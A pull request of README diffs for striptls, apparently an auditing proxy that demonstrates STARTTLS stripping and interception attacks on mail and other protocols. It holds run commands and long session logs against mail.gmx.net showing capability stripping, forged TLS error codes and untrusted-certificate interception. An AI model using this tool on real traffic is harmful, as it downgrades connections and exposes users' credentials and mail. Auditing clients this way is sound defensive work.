### PR TITLE
Audit mode

### DIFF
--- a/README.md
+++ b/README.md
@@ -29,33 +29,35 @@ poc implementation of STARTTLS stripping attacks
 
 ## Usage
 
-    #> python -m striptls --help	# in case you've installed it from pip/setup.py
-    #> python striptls                  # from source
-    Usage: striptls [options]
-            example: striptls --listen 0.0.0.0:25 --remote mail.server.tld:25 --tests *
-
-
-    Options:
-      -h, --help            show this help message and exit
-      -v, --verbose         make lots of noise [default]
-      -l LISTEN, --listen=LISTEN
-                            listen ip:port
-      -r REMOTE, --remote=REMOTE
-                            target ip:port
-      -t TESTS, --tests=TESTS
-                            Comma separated list of tests. * selects ALL.
-                            Available Tests: FTP.StripFromCapabilities,
-                            FTP.StripWithError, FTP.UntrustedIntercept,
-                            IMAP.StripFromCapabilities, IMAP.StripWithError,
-                            IMAP.UntrustedIntercept, NNTP.StripFromCapabilities,
-                            NNTP.StripWithError, NNTP.UntrustedIntercept,
-                            POP3.StripWithError, POP3.UntrustedIntercept,
-                            SMTP.StripFromCapabilities, SMTP.StripWithError,
-                            SMTP.StripWithInvalidResponseCode,
-                            SMTP.StripWithTemporaryError, SMTP.UntrustedIntercept,
-                            XMPP.StripFromCapabilities [default: *]
-    Usage: striptls [options]
-            example: striptls --listen 0.0.0.0:25 --remote mail.server.tld:25 --tests *
+    #> python -m striptls --help	# if installed from pip/setup.py
+    #> python striptls --help       # from source / root folder
+	Usage: striptls [options]
+	
+	       example: striptls --listen 0.0.0.0:25 --remote mail.server.tld:25
+	
+	
+	Options:
+	  -h, --help            show this help message and exit
+	  -v, --verbose         make lots of noise [default]
+	  -l LISTEN, --listen=LISTEN
+	                        listen ip:port [default: 0.0.0.0:<remote_port>]
+	  -r REMOTE, --remote=REMOTE
+	                        remote target ip:port to forward sessions to
+	  -k KEY, --key=KEY     SSL Certificate and Private key file to use, PEM
+	                        format assumed [default: server.pem]
+	  -x VECTORS, --vectors=VECTORS
+	                        Comma separated list of vectors. Use 'ALL' (default)
+	                        to select all vectors. Available vectors:
+	                        FTP.StripFromCapabilities, FTP.StripWithError,
+	                        FTP.UntrustedIntercept, IMAP.StripFromCapabilities,
+	                        IMAP.StripWithError, IMAP.UntrustedIntercept,
+	                        NNTP.StripFromCapabilities, NNTP.StripWithError,
+	                        NNTP.UntrustedIntercept, POP3.StripWithError,
+	                        POP3.UntrustedIntercept, SMTP.StripFromCapabilities,
+	                        SMTP.StripWithError,
+	                        SMTP.StripWithInvalidResponseCode,
+	                        SMTP.StripWithTemporaryError, SMTP.UntrustedIntercept,
+	                        XMPP.StripFromCapabilities [default: ALL]
 
 
 
@@ -71,89 +73,103 @@ from source
 
 ## Examples
 
-local smtp-client -> localhost:8825 (proxy) -> mail.gmx.net:25
+	                  inbound                    outbound
+	[inbound_peer]<------------->[listen:proxy]<------------->[outbound_peer/target]
+	  smtp-client                   striptls                    remote/target
+	  
+local `smtp-client` -> `localhost:8825` (proxy) -> `mail.gmx.net:25`
 
 ### Audit Mode
 
 iterates all protocol specific cases on a per client basis and keeps track of clients violating the starttls protocol. Ctrl+C to abort audit and print results.
 
-	#> striptls/striptls.py --listen localhost:8825 --remote=mail.gmx.net:25
-	2016-01-31 22:48:03,805 - INFO     - <Proxy 0x20a8fb0 listen=('0.0.0.0', 8825) target=('mail.gmx.net', 25)> ready.
-	2016-01-31 22:48:03,805 - DEBUG    - * added test (port:21   , proto:     FTP): <class __main__.StripFromCapabilities at 0x020B1148>
-	2016-01-31 22:48:03,805 - DEBUG    - * added test (port:21   , proto:     FTP): <class __main__.StripWithError at 0x020B1180>
-	2016-01-31 22:48:03,805 - DEBUG    - * added test (port:21   , proto:     FTP): <class __main__.UntrustedIntercept at 0x020B11B8>
-	2016-01-31 22:48:03,805 - DEBUG    - * added test (port:143  , proto:    IMAP): <class __main__.StripFromCapabilities at 0x020B1068>
-	2016-01-31 22:48:03,805 - DEBUG    - * added test (port:143  , proto:    IMAP): <class __main__.StripWithError at 0x020B10A0>
-	2016-01-31 22:48:03,805 - DEBUG    - * added test (port:143  , proto:    IMAP): <class __main__.UntrustedIntercept at 0x020B10D8>
-	2016-01-31 22:48:03,805 - DEBUG    - * added test (port:119  , proto:    NNTP): <class __main__.StripFromCapabilities at 0x020B1228>
-	2016-01-31 22:48:03,805 - DEBUG    - * added test (port:119  , proto:    NNTP): <class __main__.StripWithError at 0x020B1260>
-	2016-01-31 22:48:03,805 - DEBUG    - * added test (port:119  , proto:    NNTP): <class __main__.UntrustedIntercept at 0x020B1298>
-	2016-01-31 22:48:03,805 - DEBUG    - * added test (port:110  , proto:    POP3): <class __main__.StripWithError at 0x02099F80>
-	2016-01-31 22:48:03,805 - DEBUG    - * added test (port:110  , proto:    POP3): <class __main__.UntrustedIntercept at 0x02099FB8>
-	2016-01-31 22:48:03,805 - DEBUG    - * added test (port:25   , proto:    SMTP): <class __main__.StripFromCapabilities at 0x02099E30>
-	2016-01-31 22:48:03,805 - DEBUG    - * added test (port:25   , proto:    SMTP): <class __main__.StripWithError at 0x02099ED8>
-	2016-01-31 22:48:03,805 - DEBUG    - * added test (port:25   , proto:    SMTP): <class __main__.StripWithInvalidResponseCode at 0x02099E68>
-	2016-01-31 22:48:03,805 - DEBUG    - * added test (port:25   , proto:    SMTP): <class __main__.StripWithTemporaryError at 0x02099EA0>
-	2016-01-31 22:48:03,805 - DEBUG    - * added test (port:25   , proto:    SMTP): <class __main__.UntrustedIntercept at 0x02099F10>
-	2016-01-31 22:48:03,806 - DEBUG    - * added test (port:5222 , proto:    XMPP): <class __main__.StripFromCapabilities at 0x020B1308>
-	2016-01-31 22:48:03,806 - INFO     - <RewriteDispatcher rules={5222: set([<class __main__.StripFromCapabilities at 0x020B1308>]), 110: set([<class __main__.StripWithError at 0x02099F80>, <class __main__.UntrustedIntercept at 0x02099FB8>]), 143: set([<class __main__.StripWithError at 0x020B10A0>, <class __main__.UntrustedIntercept at 0x020B10D8>, <class __main__.StripFromCapabilities at 0x020B1068>]), 21: set([<class __main__.StripWithError at 0x020B1180>, <class __main__.UntrustedIntercept at 0x020B11B8>, <class __main__.StripFromCapabilities at 0x020B1148>]), 119: set([<class __main__.UntrustedIntercept at 0x020B1298>, <class __main__.StripFromCapabilities at 0x020B1228>, <class __main__.StripWithError at 0x020B1260>]), 25: set([<class __main__.UntrustedIntercept at 0x02099F10>, <class __main__.StripWithTemporaryError at 0x02099EA0>, <class __main__.StripFromCapabilities at 0x02099E30>, <class __main__.StripWithError at 0x02099ED8>, <class __main__.StripWithInvalidResponseCode at 0x02099E68>])}>
-	2016-01-31 22:48:07,921 - DEBUG    - <ProtocolDetect 0x20cbc50 protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)
-	2016-01-31 22:48:07,923 - INFO     - <Session 0x20be1f0> client ('127.0.0.1', 22898) has connected
-	2016-01-31 22:48:07,923 - INFO     - <Session 0x20be1f0> connecting to target ('mail.gmx.net', 25)
-	2016-01-31 22:48:08,158 - DEBUG    - <Session 0x20be1f0> [client] <= [server]          '220 gmx.com (mrgmx002) Nemesis ESMTP Service ready\r\n'
-	2016-01-31 22:48:08,158 - DEBUG    - <RewriteDispatcher  - changed mangle: __main__.UntrustedIntercept new: True>
-	2016-01-31 22:48:09,112 - DEBUG    - <Session 0x20be1f0> [client] => [server]          'ehlo [192.168.139.1]\r\n'
-	2016-01-31 22:48:09,194 - DEBUG    - <Session 0x20be1f0> [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.18]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
-	2016-01-31 22:48:09,194 - DEBUG    - <Session 0x20be1f0> [client] => [server]          'STARTTLS\r\n'
-	2016-01-31 22:48:09,194 - DEBUG    - <Session 0x20be1f0> [client] <= [server][mangled] '220 Go ahead\r\n'
-	2016-01-31 22:48:09,444 - DEBUG    - <Session 0x20be1f0> [client] <= [server][mangled] waiting for inbound SSL Handshake
-	2016-01-31 22:48:09,444 - DEBUG    - <Session 0x20be1f0> [client] => [server]          'STARTTLS\r\n'
-	2016-01-31 22:48:09,538 - DEBUG    - <Session 0x20be1f0> [client] => [server][mangled] performing outbound SSL handshake
-	2016-01-31 22:48:09,948 - DEBUG    - <Session 0x20be1f0> [client] => [server][mangled] None
-	2016-01-31 22:48:09,948 - DEBUG    - <Session 0x20be1f0> [client] => [server]          'ehlo [192.168.139.1]\r\n'
-	2016-01-31 22:48:10,029 - DEBUG    - <Session 0x20be1f0> [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.18]\r\n250-SIZE 69920427\r\n250 AUTH LOGIN PLAIN\r\n'
-	2016-01-31 22:48:10,029 - DEBUG    - <Session 0x20be1f0> [client] => [server]          'mail FROM:<a@b.com> size=10\r\n'
-	2016-01-31 22:48:10,108 - DEBUG    - <Session 0x20be1f0> [client] <= [server]          '530 Authentication required\r\n'
-	2016-01-31 22:48:10,108 - DEBUG    - <Session 0x20be1f0> [client] => [server]          'rset\r\n'
-	2016-01-31 22:48:10,217 - DEBUG    - <Session 0x20be1f0> [client] <= [server]          '250 OK\r\n'
-	2016-01-31 22:48:10,230 - WARNING  - <Session 0x20be1f0> terminated.
-	2016-01-31 22:48:12,375 - DEBUG    - <ProtocolDetect 0x20cbd70 protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)
-	2016-01-31 22:48:12,377 - INFO     - <Session 0x20cbcf0> client ('127.0.0.1', 22901) has connected
-	2016-01-31 22:48:12,377 - INFO     - <Session 0x20cbcf0> connecting to target ('mail.gmx.net', 25)
-	2016-01-31 22:48:12,517 - DEBUG    - <Session 0x20cbcf0> [client] <= [server]          '220 gmx.com (mrgmx003) Nemesis ESMTP Service ready\r\n'
-	2016-01-31 22:48:12,517 - DEBUG    - <RewriteDispatcher  - changed mangle: __main__.StripWithTemporaryError new: True>
-	2016-01-31 22:48:13,503 - DEBUG    - <Session 0x20cbcf0> [client] => [server]          'ehlo [192.168.139.1]\r\n'
-	2016-01-31 22:48:13,585 - DEBUG    - <Session 0x20cbcf0> [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.18]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
-	2016-01-31 22:48:13,601 - DEBUG    - <Session 0x20cbcf0> [client] => [server]          'STARTTLS\r\n'
-	2016-01-31 22:48:13,601 - DEBUG    - <Session 0x20cbcf0> [client] <= [server][mangled] '454 TLS not available due to temporary reason\r\n'
-	2016-01-31 22:48:13,601 - DEBUG    - <Session 0x20cbcf0> [client] => [server][mangled] None
-	2016-01-31 22:48:13,601 - DEBUG    - <Session 0x20cbcf0> [client] => [server]          'mail FROM:<a@b.com> size=10\r\n'
-	2016-01-31 22:48:13,696 - DEBUG    - <Session 0x20cbcf0> [client] <= [server]          '530 Authentication required\r\n'
-	2016-01-31 22:48:13,711 - DEBUG    - <Session 0x20cbcf0> [client] => [server]          'rset\r\n'
-	2016-01-31 22:48:13,789 - DEBUG    - <Session 0x20cbcf0> [client] <= [server]          '250 OK\r\n'
-	2016-01-31 22:48:13,805 - WARNING  - <Session 0x20cbcf0> terminated.
-	2016-01-31 22:48:15,648 - DEBUG    - <ProtocolDetect 0x20cbe30 protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)
-	2016-01-31 22:48:15,650 - INFO     - <Session 0x20cbd30> client ('127.0.0.1', 22904) has connected
-	2016-01-31 22:48:15,650 - INFO     - <Session 0x20cbd30> connecting to target ('mail.gmx.net', 25)
-	2016-01-31 22:48:15,808 - DEBUG    - <Session 0x20cbd30> [client] <= [server]          '220 gmx.com (mrgmx001) Nemesis ESMTP Service ready\r\n'
-	2016-01-31 22:48:15,808 - DEBUG    - <RewriteDispatcher  - changed mangle: __main__.StripFromCapabilities new: True>
-	2016-01-31 22:48:16,778 - DEBUG    - <Session 0x20cbd30> [client] => [server]          'ehlo [192.168.139.1]\r\n'
-	2016-01-31 22:48:16,907 - DEBUG    - <Session 0x20cbd30> [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.18]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
-	2016-01-31 22:48:16,907 - DEBUG    - <Session 0x20cbd30> [client] <= [server][mangled] '250-gmx.com Hello [192.168.139.1] [109.126.64.18]\r\n250-SIZE 31457280\r\n250 AUTH LOGIN PLAIN\r\n'
-	2016-01-31 22:48:16,921 - WARNING  - <Session 0x20cbd30> terminated.
-	2016-01-31 22:48:59,542 - WARNING  - <Session 0x20b97f0> terminated.
-	...
-	2016-01-31 22:49:03,305 - WARNING  - Ctrl C - Stopping server
-	2016-01-31 22:49:03,305 - INFO     -  -- audit results --
-	2016-01-31 22:49:03,305 - INFO     - [*] client: 127.0.0.1
-	2016-01-31 22:49:03,305 - INFO     -     [           ] <class __main__.StripFromCapabilities at 0x01ECF180>
-	2016-01-31 22:49:03,305 - INFO     -     [Vulnerable!] <class __main__.StripWithError at 0x01ECF688>
-	2016-01-31 22:49:03,305 - INFO     -     [Vulnerable!] <class __main__.UntrustedIntercept at 0x01ECF6F8>
-	2016-01-31 22:49:03,305 - INFO     -     [Vulnerable!] <class __main__.StripWithInvalidResponseCode at 0x01ECF5E0>
+	#> python striptls --listen localhost:8825 --remote=mail.gmx.net:25
+	2016-02-02 22:11:56,275 - INFO     - <Proxy 0xffcf6d0cL listen=('localhost', 8825) target=('mail.gmx.net', 25)> ready.
+	2016-02-02 22:11:56,275 - DEBUG    - * added test (port:21   , proto:     FTP): <class striptls.StripFromCapabilities at 0xffd4632c>
+	2016-02-02 22:11:56,275 - DEBUG    - * added test (port:21   , proto:     FTP): <class striptls.StripWithError at 0xffd4635c>
+	2016-02-02 22:11:56,275 - DEBUG    - * added test (port:21   , proto:     FTP): <class striptls.UntrustedIntercept at 0xffd4638c>
+	2016-02-02 22:11:56,275 - DEBUG    - * added test (port:143  , proto:    IMAP): <class striptls.StripFromCapabilities at 0xffd4626c>
+	2016-02-02 22:11:56,275 - DEBUG    - * added test (port:143  , proto:    IMAP): <class striptls.StripWithError at 0xffd4629c>
+	2016-02-02 22:11:56,275 - DEBUG    - * added test (port:143  , proto:    IMAP): <class striptls.UntrustedIntercept at 0xffd462cc>
+	2016-02-02 22:11:56,275 - DEBUG    - * added test (port:119  , proto:    NNTP): <class striptls.StripFromCapabilities at 0xffd463ec>
+	2016-02-02 22:11:56,275 - DEBUG    - * added test (port:119  , proto:    NNTP): <class striptls.StripWithError at 0xffd4641c>
+	2016-02-02 22:11:56,275 - DEBUG    - * added test (port:119  , proto:    NNTP): <class striptls.UntrustedIntercept at 0xffd4644c>
+	2016-02-02 22:11:56,275 - DEBUG    - * added test (port:110  , proto:    POP3): <class striptls.StripWithError at 0xffd461dc>
+	2016-02-02 22:11:56,275 - DEBUG    - * added test (port:110  , proto:    POP3): <class striptls.UntrustedIntercept at 0xffd4620c>
+	2016-02-02 22:11:56,275 - DEBUG    - * added test (port:25   , proto:    SMTP): <class striptls.StripFromCapabilities at 0xffd316bc>
+	2016-02-02 22:11:56,275 - DEBUG    - * added test (port:25   , proto:    SMTP): <class striptls.StripWithError at 0xffd4614c>
+	2016-02-02 22:11:56,276 - DEBUG    - * added test (port:25   , proto:    SMTP): <class striptls.StripWithInvalidResponseCode at 0xffd3138c>
+	2016-02-02 22:11:56,276 - DEBUG    - * added test (port:25   , proto:    SMTP): <class striptls.StripWithTemporaryError at 0xffd4611c>
+	2016-02-02 22:11:56,276 - DEBUG    - * added test (port:25   , proto:    SMTP): <class striptls.UntrustedIntercept at 0xffd4617c>
+	2016-02-02 22:11:56,276 - DEBUG    - * added test (port:5222 , proto:    XMPP): <class striptls.StripFromCapabilities at 0xffd464ac>
+	2016-02-02 22:11:56,276 - INFO     - <RewriteDispatcher vectors={5222: set([<class striptls.StripFromCapabilities at 0xffd464ac>]), 110: set([<class striptls.UntrustedIntercept at 0xffd4620c>, <class striptls.StripWithError at 0xffd461dc>]), 143: set([<class striptls.StripWithError at 0xffd4629c>, <class striptls.UntrustedIntercept at 0xffd462cc>, <class striptls.StripFromCapabilities at 0xffd4626c>]), 21: set([<class striptls.UntrustedIntercept at 0xffd4638c>, <class striptls.StripFromCapabilities at 0xffd4632c>, <class striptls.StripWithError at 0xffd4635c>]), 119: set([<class striptls.StripWithError at 0xffd4641c>, <class striptls.UntrustedIntercept at 0xffd4644c>, <class striptls.StripFromCapabilities at 0xffd463ec>]), 25: set([<class striptls.StripWithInvalidResponseCode at 0xffd3138c>, <class striptls.StripWithTemporaryError at 0xffd4611c>, <class striptls.StripFromCapabilities at 0xffd316bc>, <class striptls.StripWithError at 0xffd4614c>, <class striptls.UntrustedIntercept at 0xffd4617c>])}>
+	2016-02-02 22:12:08,477 - DEBUG    - <ProtocolDetect 0xffcf6eccL protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)
+	2016-02-02 22:12:08,530 - INFO     - <Session 0xffcf6e4cL> client ('127.0.0.1', 28902) has connected
+	2016-02-02 22:12:08,530 - INFO     - <Session 0xffcf6e4cL> connecting to target ('mail.gmx.net', 25)
+	2016-02-02 22:12:08,805 - DEBUG    - <Session 0xffcf6e4cL> [client] <= [server]          '220 gmx.com (mrgmx001) Nemesis ESMTP Service ready\r\n'
+	2016-02-02 22:12:08,805 - DEBUG    - <RewriteDispatcher  - changed mangle: striptls.StripWithInvalidResponseCode new: True>
+	2016-02-02 22:12:09,759 - DEBUG    - <Session 0xffcf6e4cL> [client] => [server]          'ehlo [192.168.139.1]\r\n'
+	2016-02-02 22:12:09,850 - DEBUG    - <Session 0xffcf6e4cL> [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
+	2016-02-02 22:12:09,851 - DEBUG    - <Session 0xffcf6e4cL> [client] <= [server][mangled] '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250-STARTTLS\r\n250 STARTTLS\r\n'
+	2016-02-02 22:12:09,867 - DEBUG    - <Session 0xffcf6e4cL> [client] => [server]          'STARTTLS\r\n'
+	2016-02-02 22:12:09,867 - DEBUG    - <Session 0xffcf6e4cL> [client] <= [server][mangled] '200 STRIPTLS\r\n'
+	2016-02-02 22:12:09,867 - DEBUG    - <Session 0xffcf6e4cL> [client] => [server][mangled] None
+	2016-02-02 22:12:09,883 - DEBUG    - <Session 0xffcf6e4cL> [client] => [server]          'mail FROM:<a@b.com> size=10\r\n'
+	2016-02-02 22:12:09,983 - DEBUG    - <Session 0xffcf6e4cL> [client] <= [server]          '530 Authentication required\r\n'
+	2016-02-02 22:12:09,992 - DEBUG    - <Session 0xffcf6e4cL> [client] => [server]          'rset\r\n'
+	2016-02-02 22:12:10,100 - DEBUG    - <Session 0xffcf6e4cL> [client] <= [server]          '250 OK\r\n'
+	2016-02-02 22:12:10,116 - WARNING  - <Session 0xffcf6e4cL> terminated.
+	2016-02-02 22:12:13,056 - DEBUG    - <ProtocolDetect 0xffd0920cL protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)
+	2016-02-02 22:12:13,056 - INFO     - <Session 0xffd0918cL> client ('127.0.0.1', 28905) has connected
+	2016-02-02 22:12:13,057 - INFO     - <Session 0xffd0918cL> connecting to target ('mail.gmx.net', 25)
+	2016-02-02 22:12:13,241 - DEBUG    - <Session 0xffd0918cL> [client] <= [server]          '220 gmx.com (mrgmx003) Nemesis ESMTP Service ready\r\n'
+	2016-02-02 22:12:13,241 - DEBUG    - <RewriteDispatcher  - changed mangle: striptls.StripWithTemporaryError new: True>
+	2016-02-02 22:12:14,197 - DEBUG    - <Session 0xffd0918cL> [client] => [server]          'ehlo [192.168.139.1]\r\n'
+	2016-02-02 22:12:14,289 - DEBUG    - <Session 0xffd0918cL> [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
+	2016-02-02 22:12:14,304 - DEBUG    - <Session 0xffd0918cL> [client] => [server]          'STARTTLS\r\n'
+	2016-02-02 22:12:14,305 - DEBUG    - <Session 0xffd0918cL> [client] <= [server][mangled] '454 TLS not available due to temporary reason\r\n'
+	2016-02-02 22:12:14,305 - DEBUG    - <Session 0xffd0918cL> [client] => [server][mangled] None
+	2016-02-02 22:12:14,320 - DEBUG    - <Session 0xffd0918cL> [client] => [server]          'mail FROM:<a@b.com> size=10\r\n'
+	2016-02-02 22:12:14,411 - DEBUG    - <Session 0xffd0918cL> [client] <= [server]          '530 Authentication required\r\n'
+	2016-02-02 22:12:14,415 - DEBUG    - <Session 0xffd0918cL> [client] => [server]          'rset\r\n'
+	2016-02-02 22:12:14,520 - DEBUG    - <Session 0xffd0918cL> [client] <= [server]          '250 OK\r\n'
+	2016-02-02 22:12:14,535 - WARNING  - <Session 0xffd0918cL> terminated.
+	2016-02-02 22:12:16,649 - DEBUG    - <ProtocolDetect 0xffd092ecL protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)
+	2016-02-02 22:12:16,650 - INFO     - <Session 0xffd0926cL> client ('127.0.0.1', 28908) has connected
+	2016-02-02 22:12:16,650 - INFO     - <Session 0xffd0926cL> connecting to target ('mail.gmx.net', 25)
+	2016-02-02 22:12:16,820 - DEBUG    - <Session 0xffd0926cL> [client] <= [server]          '220 gmx.com (mrgmx003) Nemesis ESMTP Service ready\r\n'
+	2016-02-02 22:12:16,820 - DEBUG    - <RewriteDispatcher  - changed mangle: striptls.StripFromCapabilities new: True>
+	2016-02-02 22:12:17,760 - DEBUG    - <Session 0xffd0926cL> [client] => [server]          'ehlo [192.168.139.1]\r\n'
+	2016-02-02 22:12:17,849 - DEBUG    - <Session 0xffd0926cL> [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
+	2016-02-02 22:12:17,849 - DEBUG    - <Session 0xffd0926cL> [client] <= [server][mangled] '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250 AUTH LOGIN PLAIN\r\n'
+	2016-02-02 22:12:17,871 - WARNING  - <Session 0xffd0926cL> terminated.
+	2016-02-02 22:12:20,071 - DEBUG    - <ProtocolDetect 0xffd093ccL protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)
+	2016-02-02 22:12:20,072 - INFO     - <Session 0xffd0934cL> client ('127.0.0.1', 28911) has connected
+	2016-02-02 22:12:20,072 - INFO     - <Session 0xffd0934cL> connecting to target ('mail.gmx.net', 25)
+	2016-02-02 22:12:20,239 - DEBUG    - <Session 0xffd0934cL> [client] <= [server]          '220 gmx.com (mrgmx002) Nemesis ESMTP Service ready\r\n'
+	2016-02-02 22:12:20,240 - DEBUG    - <RewriteDispatcher  - changed mangle: striptls.StripWithError new: True>
+	2016-02-02 22:12:21,181 - DEBUG    - <Session 0xffd0934cL> [client] => [server]          'ehlo [192.168.139.1]\r\n'
+	2016-02-02 22:12:21,269 - DEBUG    - <Session 0xffd0934cL> [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
+	2016-02-02 22:12:21,280 - DEBUG    - <Session 0xffd0934cL> [client] => [server]          'STARTTLS\r\n'
+	2016-02-02 22:12:21,281 - DEBUG    - <Session 0xffd0934cL> [client] <= [server][mangled] '501 Syntax error\r\n'
+	2016-02-02 22:12:21,281 - DEBUG    - <Session 0xffd0934cL> [client] => [server][mangled] None
+	2016-02-02 22:12:21,289 - DEBUG    - <Session 0xffd0934cL> [client] => [server]          'mail FROM:<a@b.com> size=10\r\n'
+	2016-02-02 22:12:21,381 - DEBUG    - <Session 0xffd0934cL> [client] <= [server]          '530 Authentication required\r\n'
+	2016-02-02 22:12:21,386 - DEBUG    - <Session 0xffd0934cL> [client] => [server]          'rset\r\n'
+	2016-02-02 22:12:21,469 - DEBUG    - <Session 0xffd0934cL> [client] <= [server]          '250 OK\r\n'
+	2016-02-02 22:12:21,485 - WARNING  - <Session 0xffd0934cL> terminated.
+	2016-02-02 22:12:23,665 - WARNING  - Ctrl C - Stopping server
+	2016-02-02 22:12:23,665 - INFO     -  -- audit results --
+	2016-02-02 22:12:23,666 - INFO     - [*] client: 127.0.0.1
+	2016-02-02 22:12:23,666 - INFO     -     [Vulnerable!] <class striptls.StripWithInvalidResponseCode at 0xffd3138c>
+	2016-02-02 22:12:23,666 - INFO     -     [Vulnerable!] <class striptls.StripWithTemporaryError at 0xffd4611c>
+	2016-02-02 22:12:23,666 - INFO     -     [           ] <class striptls.StripFromCapabilities at 0xffd316bc>
+	2016-02-02 22:12:23,666 - INFO     -     [Vulnerable!] <class striptls.StripWithError at 0xffd4614c>
+
 
 ### Strip STARTTLS from server capabilities
 
-	#> striptls/striptls.py --listen=localhost:8825 --remote=mail.gmx.net:25 --test=SMTP.StripFromCapabilities
+	#> python striptls --listen=localhost:8825 --remote=mail.gmx.net:25 --test=SMTP.StripFromCapabilities
 	2016-01-31 15:44:35,000 - INFO     - <Proxy 0x1fe6e70 listen=('localhost', 8825) target=('mail.gmx.net', 25)> ready.
 	2016-01-31 15:44:35,000 - INFO     - <RewriteDispatcher attacks={25: set([<class __main__.StripFromCapabilities at 0x01FE77D8>])}>
 	2016-01-31 15:44:37,030 - DEBUG    - <ProtocolDetect 0x1fe6f90 is_protocol=PROTO_SMTP len_history=0> - protocol detected (target port)
@@ -171,7 +187,7 @@ iterates all protocol specific cases on a per client basis and keeps track of cl
 
 ### Invalid STARTTLS response code
 
-	#> striptls/striptls.py --listen=localhost:8825 --remote=mail.gmx.net:25 --test=SMTP.StripWithInvalidResponseCode
+	#> python striptls --listen=localhost:8825 --remote=mail.gmx.net:25 --test=SMTP.StripWithInvalidResponseCode
 	2016-01-31 15:42:40,325 - INFO     - <Proxy 0x1fefe70 listen=('localhost', 8825) target=('mail.gmx.net', 25)> ready.
 	2016-01-31 15:42:40,325 - INFO     - <RewriteDispatcher attacks={25: set([<class __main__.StripWithInvalidResponseCode at 0x02010730>])}>
 	2016-01-31 15:43:19,755 - DEBUG    - <ProtocolDetect 0x1feff90 is_protocol=PROTO_SMTP len_history=0> - protocol detected (target port)
@@ -193,7 +209,7 @@ iterates all protocol specific cases on a per client basis and keeps track of cl
 
 ### Untrusted SSL Intercept (for clients not checking server cert trust)
 
-	#> striptls/striptls.py --listen=localhost:8825 --remote=mail.gmx.net:25 --test=SMTP.UntrustedIntercept
+	#> python striptls --listen=localhost:8825 --remote=mail.gmx.net:25 --test=SMTP.UntrustedIntercept
 	2016-01-31 15:59:02,417 - INFO     - <Proxy 0x1f468f0 listen=('localhost', 8825) target=('mail.gmx.net', 25)> ready.
 	2016-01-31 15:59:02,417 - INFO     - <RewriteDispatcher attacks={25: set([<class __main__.UntrustedIntercept at 0x01F45298>])}>
 	2016-01-31 15:59:06,292 - DEBUG    - <ProtocolDetect 0x1f46a10 protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)

--- a/README.md
+++ b/README.md
@@ -26,8 +26,49 @@ poc implementation of STARTTLS stripping attacks
  * NNTP.UntrustedIntercept
 * XMPP (untested)
  * XMPP.StripFromCapabilities
- 
- 
+
+## Usage
+
+    #> python -m striptls --help	# in case you've installed it from pip/setup.py
+    #> python striptls                  # from source
+    Usage: striptls [options]
+            example: striptls --listen 0.0.0.0:25 --remote mail.server.tld:25 --tests *
+
+
+    Options:
+      -h, --help            show this help message and exit
+      -v, --verbose         make lots of noise [default]
+      -l LISTEN, --listen=LISTEN
+                            listen ip:port
+      -r REMOTE, --remote=REMOTE
+                            target ip:port
+      -t TESTS, --tests=TESTS
+                            Comma separated list of tests. * selects ALL.
+                            Available Tests: FTP.StripFromCapabilities,
+                            FTP.StripWithError, FTP.UntrustedIntercept,
+                            IMAP.StripFromCapabilities, IMAP.StripWithError,
+                            IMAP.UntrustedIntercept, NNTP.StripFromCapabilities,
+                            NNTP.StripWithError, NNTP.UntrustedIntercept,
+                            POP3.StripWithError, POP3.UntrustedIntercept,
+                            SMTP.StripFromCapabilities, SMTP.StripWithError,
+                            SMTP.StripWithInvalidResponseCode,
+                            SMTP.StripWithTemporaryError, SMTP.UntrustedIntercept,
+                            XMPP.StripFromCapabilities [default: *]
+    Usage: striptls [options]
+            example: striptls --listen 0.0.0.0:25 --remote mail.server.tld:25 --tests *
+
+
+
+## Install (optional)
+
+from pip
+
+    #> pip install striptls
+
+from source
+
+    #> setup.py install
+
 ## Examples
 
 local smtp-client -> localhost:8825 (proxy) -> mail.gmx.net:25

--- a/README.md
+++ b/README.md
@@ -1,4 +1,4 @@
-# striptls - proxy
+# striptls - auditing proxy
 
 poc implementation of STARTTLS stripping attacks
 
@@ -8,14 +8,27 @@ poc implementation of STARTTLS stripping attacks
  * SMTP.UntrustedIntercept - STARTTLS interception (client and server talking ssl) (requires server.pem in pwd)
  * SMTP.StripWithTemporaryError
  * SMTP.StripWithError
-
 * POP3 (untested)
+ * POP3.StripFromCapabilities
+ * POP3.StripWithError
+ * POP3.UntrustedIntercept
 * IMAP (untested)
+ * IMAP.StripFromCapabilities
+ * IMAP.StripWithError
+ * IMAP.UntrustedIntercept
 * FTP (untested)
+ * FTP.StripFromCapabilities
+ * FTP.StripWithError
+ * FTP.UntrustedIntercept
 * NNTP (untested)
+ * NNTP.StripFromCapabilities  
+ * NNTP.StripWithError
+ * NNTP.UntrustedIntercept
 * XMPP (untested)
-
-## Attacks
